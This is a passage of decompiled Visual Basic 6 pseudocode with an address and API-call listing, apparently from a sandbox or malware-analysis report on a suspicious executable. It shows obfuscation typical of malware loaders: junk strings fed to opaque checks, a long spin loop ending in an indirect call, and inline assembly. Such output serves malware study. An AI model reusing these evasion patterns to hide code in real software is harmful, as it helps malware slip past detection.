          					if(_v596 >= 0) {
          						_t609 =  &_v724;
          						 *_t609 = _v724 & 0x00000000;
          						__eflags =  *_t609;
          					} else {
          						_push(0x704);
          						_push(0x4105e8);
          						_push(_a4);
          						_push(_v596);
          						L00401906();
          						_v724 = _t1225;
          					}
          					_v100 = _v564;
          					_v8 = 0x3d;
          					 *((intOrPtr*)( *_a4 + 0x738))(_a4);
          					_v8 = 0x3e;
          					_t1231 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
          					_v596 = _t1231;
          					if(_v596 >= 0) {
          						_t626 =  &_v728;
          						 *_t626 = _v728 & 0x00000000;
          						__eflags =  *_t626;
          					} else {
          						_push(0x6f8);
          						_push(0x4105e8);
          						_push(_a4);
          						_push(_v596);
          						L00401906();
          						_v728 = _t1231;
          					}
          					_v8 = 0x3f;
          					_v556 = 0x1854;
          					_v584 =  *0x401458;
          					 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0xbb1ac,  &_v556,  &_v592);
          					_v292 = _v592;
          					_v8 = 0x40;
          					_v556 = 0x5bd9;
          					_v584 =  *0x401450;
          					 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x37b,  &_v584,  &_v556,  &_v560);
          					_v284 = _v560;
          					_v8 = 0x41;
          					_t1248 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
          					_v596 = _t1248;
          					if(_v596 >= 0) {
          						_t660 =  &_v732;
          						 *_t660 = _v732 & 0x00000000;
          						__eflags =  *_t660;
          					} else {
          						_push(0x6fc);
          						_push(0x4105e8);
          						_push(_a4);
          						_push(_v596);
          						L00401906();
          						_v732 = _t1248;
          					}
          					_v280 = _v556;
          					_v8 = 0x42;
          					_t1253 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
          					_v596 = _t1253;
          					if(_v596 >= 0) {
          						_t674 =  &_v736;
          						 *_t674 = _v736 & 0x00000000;
          						__eflags =  *_t674;
          					} else {
          						_push(0x718);
          						_push(0x4105e8);
          						_push(_a4);
          						_push(_v596);
          						L00401906();
          						_v736 = _t1253;
          					}
          					_v232 = _v564;
          					_v8 = 0x43;
          					L004018F4();
          					_v556 = 0x5b73;
          					 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v556,  &_v312,  &_v584);
          					_t1524 = _v584;
          					_v48 = _t1524;
          					L00401924();
          					_v8 = 0x44;
          					_v448 = 0x2ffff;
          					_v456 = 0x8003;
          					_push( &_v132);
          					_t1261 =  &_v456;
          					_push(_t1261);
          					L004018DC();
          					_t1262 = _t1261;
          					if(_t1262 == 0) {
          						break;
          					}
          				}
          				_v8 = 0x47;
          				_v448 = 0xe8;
          				do {
          					_t1262 = _t1262 + 1;
          					__eflags = _t1262 - 0xfff9a646;
          				} while (_t1262 != 0xfff9a646);
          				 *_t1443(_t1262 + 0x46f11c);
          				asm("movsb");
          				L004018E8();
          				_v8 = 0x48;
          				_v572 = 0x8904d3f8;
          				_v568 = 0x98e72e79;
          				_v564 = 0x5f72a;
          				_push(0x98e72e79);
          				_push(L"bangsternears");
          				_t1265 =  &_v320;
          				_push(_t1265);
          				L004018D6();
          				_push(_t1265);
          				_push( &_v572);
          				_push( &_v568);
          				_push( &_v564);
          				_push(0x8310a4);
          				_push(L"samtaleemnetsrhes");
          				_t1269 =  &_v316;
          				_push(_t1269);
          				L004018D6();
          				_push(_t1269);
          				_push(L"Charcuterieganocephalantu");
          				_t1270 =  &_v312;
          				_push(_t1270);
          				L004018D6();
          				_push(_t1270);
          				E004115F4();
          				_v576 = _t1270;
          				L004018D0();
          				__eflags = _v576 - 0x8904d3f8;
          				_v596 =  ~(0 | _v576 == 0x8904d3f8);
          				_push( &_v320);
          				_push( &_v316);
          				_push( &_v312);
          				_push(3);
          				L004018CA();
          				_t1444 = _t1443 + 0x10;
          				__eflags = _v596;
          				if(_v596 != 0) {
          					_v8 = 0x49;
          					_v8 = 0x4a;
          					__eflags =  *0x4183d8;
          					if( *0x4183d8 != 0) {
          						_v740 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v740 = 0x4183d8;
          					}
          					_v596 =  *_v740;
          					_t1354 =  &_v344;
          					L004018B2();
          					_t1444 = _t1444 + 0x10;
          					L004018B8();
          					_t1355 =  &_v324;
          					L004018BE();
          					_t1358 =  *((intOrPtr*)( *_v596 + 0xc))(_v596, _t1355, _t1355, _t1354, _t1354, _t1354, _v164, L"M9uACtmJ7nAtSvje8kbN9w249", 0);
          					asm("fclex");
          					_v600 = _t1358;
          					__eflags = _v600;
          					if(_v600 >= 0) {
          						_t733 =  &_v744;
          						 *_t733 = _v744 & 0x00000000;
          						__eflags =  *_t733;
          					} else {
          						_push(0xc);
          						_push(0x411ad0);
          						_push(_v596);
          						_push(_v600);
          						L00401906();
          						_v744 = _t1358;
          					}
          					L004018AC();
          					L00401912();
          				}
          				_v8 = 0x4c;
          				_v564 = 0x792720;
          				_t739 =  &_v564; // 0x792720
          				_push(L"bangsternears");
          				_t1279 =  &_v312;
          				_push(_t1279);
          				L004018D6();
          				_push(_t1279);
          				E0041165C();
          				_v556 = _t1279;
          				L004018D0();
          				asm("sbb eax, eax");
          				_v596 =  ~( ~(_v556 - 0x8904d3f8) + 1);
          				L00401924();
          				__eflags = _v596;
          				if(_v596 != 0) {
          					_v8 = 0x4d;
          					_v8 = 0x4e;
          					_v448 = L"rebslagerierneshand";
          					_v456 = 8;
          					_v480 = 0x6e5392;
          					_v488 = 3;
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(2);
          					_push(L"EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25");
          					_push(_v40);
          					L004018FA();
          					_t1444 = _t1444 + 0x2c;
          				}
          				_v8 = 0x50;
          				_push(0x8904d3f8);
          				_push(L"Statscheferstronhi8");
          				_t1286 =  &_v316;
          				_push(_t1286);
          				L004018D6();
          				_push(_t1286);
          				_push(L"encryptions");
          				_t1287 =  &_v312;
          				_push(_t1287);
          				L004018D6();
          				_push(_t1287);
          				_push(0x753eca);
          				_push(0x3db7db);
          				_push(0x8904d3f8);
          				E0041169C();
          				_v564 = _t1287;
          				L004018D0();
          				__eflags = _v564 - 0x98e72e79;
          				_v596 =  ~(0 | _v564 == 0x98e72e79);
          				_push( &_v316);
          				_push( &_v312);
          				_push(2);
          				L004018CA();
          				_t1445 = _t1444 + 0xc;
          				_t1293 = _v596;
          				__eflags = _t1293;
          				if(_t1293 != 0) {
          					_v8 = 0x51;
          					_v8 = 0x52;
          					_push(0);
          					_push(L"sykofanter");
          					_push( &_v344);
          					L00401918();
          					_t1293 = 0x10;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0);
          					_push(_v264);
          					L0040191E();
          					L00401912();
          				}
          				_v8 = 0x54;
          				_push(0x3a3aea);
          				_push(0x8904d3f8);
          				_push(0x98e72e79);
          				_push(0x98e72e79);
          				E004116EC();
          				_v564 = _t1293;
          				L004018D0();
          				__eflags = _v564 - 0x404672;
          				if(_v564 == 0x404672) {
          					_v8 = 0x55;
          					_v8 = 0x56;
          					_v448 = L"rebslagerierneshand";
          					_v456 = 8;
          					L004018A0();
          					_push(2);
          					_t1293 =  &_v344;
          					_push(_t1293);
          					L004018A6();
          					_v200 = _t1524;
          					L00401912();
          				}
          				_v8 = 0x58;
          				_push(0x350dde);
          				_push(0x58e1c9);
          				E0041173C();
          				_v564 = _t1293;
          				L004018D0();
          				__eflags = _v564 - 0x5bdd58;
          				if(_v564 == 0x5bdd58) {
          					_v8 = 0x59;
          					_v384 = 0x80020004;
          					_v392 = 0xa;
          					_v368 = 0x80020004;
          					_v376 = 0xa;
          					_v352 = 0x80020004;
          					_v360 = 0xa;
          					_v448 = L"Charcuterieganocephalantu";
          					_v456 = 8;
          					L004018A0();
          					_push( &_v392);
          					_push( &_v376);
          					_push( &_v360);
          					_push(0);
          					_push( &_v344);
          					L0040189A();
          					_push( &_v392);
          					_push( &_v376);
          					_push( &_v360);
          					_t1293 =  &_v344;
          					_push(_t1293);
          					_push(4);
          					L00401942();
          					_t1445 = _t1445 + 0x14;
          				}
          				_v8 = 0x5b;
          				L004018F4();
          				_push(_t1293);
          				_push( &_v316);
          				L004018D6();
          				_push(0x8904d3f8);
          				_t1295 =  &_v316;
          				_push(_t1295);
          				E004117B0();
          				_v564 = _t1295;
          				L004018D0();
          				__eflags = _v564 - 0x272878;
          				_v596 =  ~(0 | _v564 == 0x00272878);
          				_push( &_v316);
          				_push( &_v312);
          				_push(2);
          				L004018CA();
          				_t1301 = _v596;
          				__eflags = _t1301;
          				if(_t1301 != 0) {
          					_v8 = 0x5c;
          					_push(L"LAANELOFTERNE");
          					L00401894();
          				}
          				_v8 = 0x5e;
          				_push(0x8904d3f8);
          				_push(0xd2930);
          				E004117FC();
          				_v564 = _t1301;
          				L004018D0();
          				__eflags = _v564 - 0x8904d3f8;
          				if(_v564 == 0x8904d3f8) {
          					_v8 = 0x5f;
          					_v448 = L"samtaleemnetsrhes";
          					_v456 = 8;
          					L004018A0();
          					_push( &_v344);
          					L0040188E();
          					L00401912();
          				}
          				_v8 = 0x61;
          				_push(L"Gooiest4");
          				_t1302 =  &_v312;
          				_push(_t1302);
          				L004018D6();
          				_push(_t1302);
          				_push(0x98e72e79);
          				E00411840();
          				_v564 = _t1302;
          				L004018D0();
          				__eflags = _v564 - 0x86be28;
          				_v596 =  ~(0 | _v564 == 0x0086be28);
          				L00401924();
          				_t1306 = _v596;
          				__eflags = _t1306;
          				if(_t1306 != 0) {
          					_v8 = 0x62;
          					_v8 = 0x63;
          					_v448 = L"Porto7";
          					_v456 = 8;
          					L004018A0();
          					_push(2);
          					_t1306 =  &_v344;
          					_push(_t1306);
          					L004018A6();
          					_v160 = _t1524;
          					L00401912();
          				}
          				_v8 = 0x65;
          				_push(0x753f16);
          				_push(0x98e72e79);
          				_push(0x49db89);
          				E00411884();
          				_v564 = _t1306;
          				L004018D0();
          				__eflags = _v564 - 0x98e72e79;
          				if(_v564 == 0x98e72e79) {
          					_v8 = 0x66;
          					__eflags =  *0x4183d8;
          					if( *0x4183d8 != 0) {
          						_v748 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v748 = 0x4183d8;
          					}
          					_v596 =  *_v748;
          					_t1338 =  &_v324;
          					L004018BE();
          					_t1306 =  *((intOrPtr*)( *_v596 + 0x10))(_v596, _t1338, _t1338, _a4);
          					asm("fclex");
          					_v600 = _t1306;
          					__eflags = _v600;
          					if(_v600 >= 0) {
          						_t865 =  &_v752;
          						 *_t865 = _v752 & 0x00000000;
          						__eflags =  *_t865;
          					} else {
          						_push(0x10);
          						_push(0x411ad0);
          						_push(_v596);
          						_push(_v600);
          						L00401906();
          						_v752 = _t1306;
          					}
          					L004018AC();
          				}
          				_v8 = 0x68;
          				_push(0x2a551);
          				_push(0x98e72e79);
          				_push(0x8904d3f8);
          				E004118CC();
          				_v564 = _t1306;
          				L004018D0();
          				__eflags = _v564 - 0x8904d3f8;
          				if(_v564 == 0x8904d3f8) {
          					_v8 = 0x69;
          					_t1329 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v324);
          					asm("fclex");
          					_v596 = _t1329;
          					__eflags = _v596;
          					if(_v596 >= 0) {
          						_t881 =  &_v756;
          						 *_t881 = _v756 & 0x00000000;
          						__eflags =  *_t881;
          					} else {
          						_push(0x160);
          						_push(0x4105b8);
          						_push(_a4);
          						_push(_v596);
          						L00401906();
          						_v756 = _t1329;
          					}
          					__eflags =  *0x4183d8;
          					if( *0x4183d8 != 0) {
          						_v760 = 0x4183d8;
          					} else {
          						_push(0x4183d8);
          						_push(0x411ae0);
          						L004018C4();
          						_v760 = 0x4183d8;
          					}
          					_v600 =  *_v760;
          					_v628 = _v324;
          					_v324 = _v324 & 0x00000000;
          					_t1333 =  &_v328;
          					L00401888();
          					_t1306 =  *((intOrPtr*)( *_v600 + 0x40))(_v600, _t1333, _t1333, _v628, L"incomprehensible");
          					asm("fclex");
          					_v604 = _t1306;
          					__eflags = _v604;
          					if(_v604 >= 0) {
          						_t901 =  &_v764;
          						 *_t901 = _v764 & 0x00000000;
          						__eflags =  *_t901;
          					} else {
          						_push(0x40);
          						_push(0x411ad0);
          						_push(_v600);
          						_push(_v604);
          						L00401906();
          						_v764 = _t1306;
          					}
          					L004018AC();
          				}
          				_v8 = 0x6b;
          				_push(0x8904d3f8);
          				E00411914();
          				_v564 = _t1306;
          				L004018D0();
          				__eflags = _v564 - 0x98e72e79;
          				if(_v564 == 0x98e72e79) {
          					_v8 = 0x6c;
          					_v8 = 0x6d;
          					_v432 = 0x80020004;
          					_v440 = 0xa;
          					_v416 = 0x80020004;
          					_v424 = 0xa;
          					_v400 = 0x80020004;
          					_v408 = 0xa;
          					_v384 = 0x80020004;
          					_v392 = 0xa;
          					_v368 = 0x80020004;
          					_v376 = 0xa;
          					_v352 = 0x80020004;
          					_v360 = 0xa;
          					_v448 = L"samtaleemnetsrhes";
          					_v456 = 8;
          					L004018A0();
          					_push( &_v440);
          					_push( &_v424);
          					_push( &_v408);
          					_push( &_v392);
          					_push( &_v376);
          					_push( &_v360);
          					_push( &_v344);
          					L0040187C();
          					L00401882();
          					_push( &_v440);
          					_push( &_v424);
          					_push( &_v408);
          					_push( &_v392);
          					_push( &_v376);
          					_push( &_v360);
          					_push( &_v344);
          					_push(7);
          					L00401942();
          				}
          				_v8 = 0x6f;
          				_push(L"Gastriloquy");
          				_t1307 =  &_v312;
          				_push(_t1307);
          				L004018D6();
          				_push(_t1307);
          				E00411970();
          				_v564 = _t1307;
          				L004018D0();
          				__eflags = _v564 - 0x2ee60b;
          				_v596 =  ~(0 | _v564 == 0x002ee60b);
          				L00401924();
          				_t1311 = _v596;
          				__eflags = _t1311;
          				if(__eflags != 0) {
          					_v8 = 0x70;
          					_v8 = 0x71;
          					_push(0x1c);
          					L00401876();
          					_v144 = _t1311;
          				}
          				_v8 = 0x73;
          				asm("fldz");
          				L00401756();
          				L0040193C();
          				asm("fcomp qword [0x4013a0]");
          				asm("fnstsw ax");
          				asm("sahf");
          				if(__eflags != 0) {
          					_v8 = 0x74;
          					L00401870();
          				}
          				_v20 = 0;
          				asm("wait");
          				_push(0x414a5b);
          				L004018AC();
          				L004018AC();
          				L00401912();
          				L00401912();
          				L00401924();
          				L004018AC();
          				L004018AC();
          				L004018AC();
          				return _t1311;
          			}
          0x00413b1f
          0x00413b43
          0x00413b49
          0x00413b4b
          0x00413b58
          0x00413b7a
          0x00413b7a
          0x00413b7a
          0x00413b5a
          0x00413b5a
          0x00413b5f
          0x00413b64
          0x00413b67
          0x00413b6d
          0x00413b72
          0x00413b72
          0x00413b81
          0x00413b88
          0x00413b8f
          0x00413b96
          0x00413ba9
          0x00413bae
          0x00413bae
          0x00413bb5
          0x00413bbf
          0x00413bdb
          0x00413be2
          0x00413be5
          0x00413bea
          0x00413bf1
          0x00413c00
          0x00413c0e
          0x00413c31
          0x00413c37
          0x00413c4d
          0x00413c53
          0x00413c60
          0x00413c82
          0x00413c82
          0x00413c82
          0x00413c62
          0x00413c62
          0x00413c67
          0x00413c6c
          0x00413c6f
          0x00413c75
          0x00413c7a
          0x00413c7a
          0x00413c8f
          0x00413c92
          0x00413ca1
          0x00413ca7
          0x00413cb6
          0x00413cbc
          0x00413cc9
          0x00413ceb
          0x00413ceb
          0x00413ceb
          0x00413ccb
          0x00413ccb
          0x00413cd0
          0x00413cd5
          0x00413cd8
          0x00413cde
          0x00413ce3
          0x00413ce3
          0x00413cf2
          0x00413cf9
          0x00413d08
          0x00413d30
          0x00413d3c
          0x00413d42
          0x00413d49
          0x00413d58
          0x00413d80
          0x00413d8d
          0x00413d94
          0x00413daa
          0x00413db0
          0x00413dbd
          0x00413ddf
          0x00413ddf
          0x00413ddf
          0x00413dbf
          0x00413dbf
          0x00413dc4
          0x00413dc9
          0x00413dcc
          0x00413dd2
          0x00413dd7
          0x00413dd7
          0x00413ded
          0x00413df4
          0x00413e0a
          0x00413e10
          0x00413e1d
          0x00413e3f
          0x00413e3f
          0x00413e3f
          0x00413e1f
          0x00413e1f
          0x00413e24
          0x00413e29
          0x00413e2c
          0x00413e32
          0x00413e37
          0x00413e37
          0x00413e4c
          0x00413e52
          0x00413e64
          0x00413e69
          0x00413e8f
          0x00413e95
          0x00413e9b
          0x00413ea4
          0x00413ea9
          0x00413eb0
          0x00413eba
          0x00413ec7
          0x00413ec8
          0x00413ece
          0x00413ecf
          0x00413ed4
          0x00413ed9
          0x00000000
          0x00000000
          0x00413edb
          0x00413ee0
          0x00413ee7
          0x00413ef1
          0x00413ef1
          0x00413ef2
          0x00413ef2
          0x00413eff
          0x00413f03
          0x00413f04
          0x00413f09
          0x00413f10
          0x00413f1a
          0x00413f24
          0x00413f2e
          0x00413f33
          0x00413f38
          0x00413f3e
          0x00413f3f
          0x00413f44
          0x00413f4b
          0x00413f52
          0x00413f59
          0x00413f5a
          0x00413f5f
          0x00413f64
          0x00413f6a
          0x00413f6b
          0x00413f70
          0x00413f71
          0x00413f76
          0x00413f7c
          0x00413f7d
          0x00413f82
          0x00413f83
          0x00413f88
          0x00413f8e
          0x00413f95
          0x00413fa4
          0x00413fb1
          0x00413fb8
          0x00413fbf
          0x00413fc0
          0x00413fc2
          0x00413fc7
          0x00413fd1
          0x00413fd3
          0x00413fd9
          0x00413fe0
          0x00413fe7
          0x00413fee
          0x0041400b
          0x00413ff0
          0x00413ff0
          0x00413ff5
          0x00413ffa
          0x00413fff
          0x00413fff
          0x0041401d
          0x00414030
          0x00414037
          0x0041403c
          0x00414040
          0x00414046
          0x0041404d
          0x00414061
          0x00414064
          0x00414066
          0x0041406c
          0x00414073
          0x00414095
          0x00414095
          0x00414095
          0x00414075
          0x00414075
          0x00414077
          0x0041407c
          0x00414082
          0x00414088
          0x0041408d
          0x0041408d
          0x004140a2
          0x004140ad
          0x004140ad
          0x004140b2
          0x004140b9
          0x004140c3
          0x004140ca
          0x004140cf
          0x004140d5
          0x004140d6
          0x004140db
          0x004140dc
          0x004140e1
          0x004140e8
          0x004140fb
          0x00414100
          0x0041410d
          0x00414119
          0x0041411b
          0x0041411d
          0x00414124
          0x0041412b
          0x00414135
          0x0041413f
          0x00414149
          0x00414153
          0x00414156
          0x00414163
          0x00414164
          0x00414165
          0x00414166
          0x00414167
          0x0041416a
          0x00414177
          0x00414178
          0x00414179
          0x0041417a
          0x0041417b
          0x0041417d
          0x00414182
          0x00414185
          0x0041418a
          0x0041418a
          0x0041418d
          0x00414194
          0x00414199
          0x0041419e
          0x004141a4
          0x004141a5
          0x004141aa
          0x004141ab
          0x004141b0
          0x004141b6
          0x004141b7
          0x004141bc
          0x004141bd
          0x004141c2
          0x004141c7
          0x004141cc
          0x004141d1
          0x004141d7
          0x004141de
          0x004141ed
          0x004141fa
          0x00414201
          0x00414202
          0x00414204
          0x00414209
          0x0041420c
          0x00414213
          0x00414215
          0x00414217
          0x0041421e
          0x00414225
          0x00414227
          0x00414232
          0x00414233
          0x0041423a
          0x0041423b
          0x00414248
          0x00414249
          0x0041424a
          0x0041424b
          0x0041424c
          0x0041424e
          0x00414254
          0x0041425f
          0x0041425f
          0x00414264
          0x0041426b
          0x00414270
          0x00414275
          0x0041427a
          0x0041427f
          0x00414284
          0x0041428a
          0x0041428f
          0x00414299
          0x0041429b
          0x004142a2
          0x004142a9
          0x004142b3
          0x004142c9
          0x004142ce
          0x004142d0
          0x004142d6
          0x004142d7
          0x004142dc
          0x004142e8
          0x004142e8
          0x004142ed
          0x004142f4
          0x004142f9
          0x004142fe
          0x00414303
          0x00414309
          0x0041430e
          0x00414318
          0x0041431e
          0x00414325
          0x0041432f
          0x00414339
          0x00414343
          0x0041434d
          0x00414357
          0x00414361
          0x0041436b
          0x00414381
          0x0041438c
          0x00414393
          0x0041439a
          0x0041439b
          0x004143a3
          0x004143a4
          0x004143af
          0x004143b6
          0x004143bd
          0x004143be
          0x004143c4
          0x004143c5
          0x004143c7
          0x004143cc
          0x004143cc
          0x004143cf
          0x004143e1
          0x004143e6
          0x004143ed
          0x004143ee
          0x004143f3
          0x004143f8
          0x004143fe
          0x004143ff
          0x00414404
          0x0041440a
          0x00414411
          0x00414420
          0x0041442d
          0x00414434
          0x00414435
          0x00414437
          0x0041443f
          0x00414446
          0x00414448
          0x0041444a
          0x00414451
          0x00414456
          0x00414456
          0x0041445b
          0x00414462
          0x00414467
          0x0041446c
          0x00414471
          0x00414477
          0x0041447c
          0x00414486
          0x00414488
          0x0041448f
          0x00414499
          0x004144af
          0x004144ba
          0x004144bb
          0x004144c6
          0x004144c6
          0x004144cb
          0x004144d2
          0x004144d7
          0x004144dd
          0x004144de
          0x004144e3
          0x004144e4
          0x004144e9
          0x004144ee
          0x004144f4
          0x004144fb
          0x0041450a
          0x00414517
          0x0041451c
          0x00414523
          0x00414525
          0x00414527
          0x0041452e
          0x00414535
          0x0041453f
          0x00414555
          0x0041455a
          0x0041455c
          0x00414562
          0x00414563
          0x00414568
          0x00414574
          0x00414574
          0x00414579
          0x00414580
          0x00414585
          0x0041458a
          0x0041458f
          0x00414594
          0x0041459a
          0x0041459f
          0x004145a9
          0x004145af
          0x004145b6
          0x004145bd
          0x004145da
          0x004145bf
          0x004145bf
          0x004145c4
          0x004145c9
          0x004145ce
          0x004145ce
          0x004145ec
          0x004145f5
          0x004145fc
          0x00414610
          0x00414613
          0x00414615
          0x0041461b
          0x00414622
          0x00414644
          0x00414644
          0x00414644
          0x00414624
          0x00414624
          0x00414626
          0x0041462b
          0x00414631
          0x00414637
          0x0041463c
          0x0041463c
          0x00414651
          0x00414651
          0x00414656
          0x0041465d
          0x00414662
          0x00414667
          0x0041466c
          0x00414671
          0x00414677
          0x0041467c
          0x00414686
          0x0041468c
          0x004146a2
          0x004146a8
          0x004146aa
          0x004146b0
          0x004146b7
          0x004146d9
          0x004146d9
          0x004146d9
          0x004146b9
          0x004146b9
          0x004146be
          0x004146c3
          0x004146c6
          0x004146cc
          0x004146d1
          0x004146d1
          0x004146e0
          0x004146e7
          0x00414704
          0x004146e9
          0x004146e9
          0x004146ee
          0x004146f3
          0x004146f8
          0x004146f8
          0x00414716
          0x00414722
          0x00414728
          0x0041473a
          0x00414741
          0x00414755
          0x00414758
          0x0041475a
          0x00414760
          0x00414767
          0x00414789
          0x00414789
          0x00414789
          0x00414769
          0x00414769
          0x0041476b
          0x00414770
          0x00414776
          0x0041477c
          0x00414781
          0x00414781
          0x00414796
          0x00414796
          0x0041479b
          0x004147a2
          0x004147a7
          0x004147ac
          0x004147b2
          0x004147b7
          0x004147c1
          0x004147c7
          0x004147ce
          0x004147d5
          0x004147df
          0x004147e9
          0x004147f3
          0x004147fd
          0x00414807
          0x00414811
          0x0041481b
          0x00414825
          0x0041482f
          0x00414839
          0x00414843
          0x0041484d
          0x00414857
          0x0041486d
          0x00414878
          0x0041487f
          0x00414886
          0x0041488d
          0x00414894
          0x0041489b
          0x004148a2
          0x004148a3
          0x004148b0
          0x004148bb
          0x004148c2
          0x004148c9
          0x004148d0
          0x004148d7
          0x004148de
          0x004148e5
          0x004148e6
          0x004148e8
          0x004148ed
          0x004148f0
          0x004148f7
          0x004148fc
          0x00414902
          0x00414903
          0x00414908
          0x00414909
          0x0041490e
          0x00414914
          0x0041491b
          0x0041492a
          0x00414937
          0x0041493c
          0x00414943
          0x00414945
          0x00414947
          0x0041494e
          0x00414955
          0x00414957
          0x0041495c
          0x0041495c
          0x00414962
          0x00414969
          0x0041496b
          0x00414970
          0x00414975
          0x0041497b
          0x0041497d
          0x0041497e
          0x00414980
          0x00414987
          0x00414987
          0x0041498c
          0x00414993
          0x00414994
          0x00414a11
          0x00414a19
          0x00414a21
          0x00414a29
          0x00414a34
          0x00414a3f
          0x00414a4a
          0x00414a55
          0x00414a5a

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004129D2
          • #680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00412A80
          • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00412AA2
          • #664.MSVBVM60(?,00000002,00000002,00000002,00000002), ref: 00412B21
          • __vbaStrVarVal.MSVBVM60(?,?,?,00000002,00000002,00000002,00000002), ref: 00412B34
          • #581.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00412B3A
          • __vbaFpR8.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00412B3F
          • __vbaFreeStr.MSVBVM60 ref: 00412B77
          • __vbaFreeVarList.MSVBVM60(00000005,00000002,00000002,00000002,00000002,?), ref: 00412BA1
          • #716.MSVBVM60(?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412BD0
          • __vbaChkstk.MSVBVM60(?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412BD8
          • __vbaLateIdSt.MSVBVM60(?,00000000,?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412BEE
          • __vbaFreeVar.MSVBVM60(?,00000000,?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412BF9
          • #516.MSVBVM60(00411A30,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412C0A
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,00000254), ref: 00412C50
          • #676.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00412CB6
          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00412CBB
          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00412CFD
          • __vbaChkstk.MSVBVM60 ref: 00412D60
          • __vbaChkstk.MSVBVM60 ref: 00412D74
          • __vbaChkstk.MSVBVM60 ref: 00412D88
          • __vbaLateMemCall.MSVBVM60(?,NzXRmXMzPSdU58,00000003), ref: 00412DA6
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000718), ref: 00412DEC
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000708), ref: 00412EB2
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000708), ref: 00412F38
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8), ref: 00412F9B
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006FC), ref: 0041308C
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000718), ref: 004130EC
          • __vbaStrCopy.MSVBVM60(00000000,?,004105E8,00000718), ref: 0041311E
          • __vbaFreeStr.MSVBVM60 ref: 0041315E
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8), ref: 00413212
          • __vbaStrCopy.MSVBVM60(00000000,?,004105E8,000006F8), ref: 00413238
          • __vbaFreeStr.MSVBVM60 ref: 00413272
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8), ref: 004132F1
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,0000070C,?,?,8904D3F8,000000F1,0CDBA990,00005B00,?,8904D3F8,?), ref: 004133BA
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000700,?,?,8904D3F8,000000F1,0CDBA990,00005B00,?,8904D3F8,?), ref: 00413405
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,0000070C,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059,?,00000086), ref: 0041358B
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059,?,00000086), ref: 004135D6
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,0000070C,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05), ref: 0041369B
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006FC,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 004137B4
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 0041380D
          • __vbaStrCopy.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 00413833
          • __vbaFreeStr.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 00413870
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000710,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413949
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000708,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 004139D5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,00000714,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413AAC
          • __vbaOnError.MSVBVM60(000000FF,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79), ref: 00413AD5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,000001B8,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413B1A
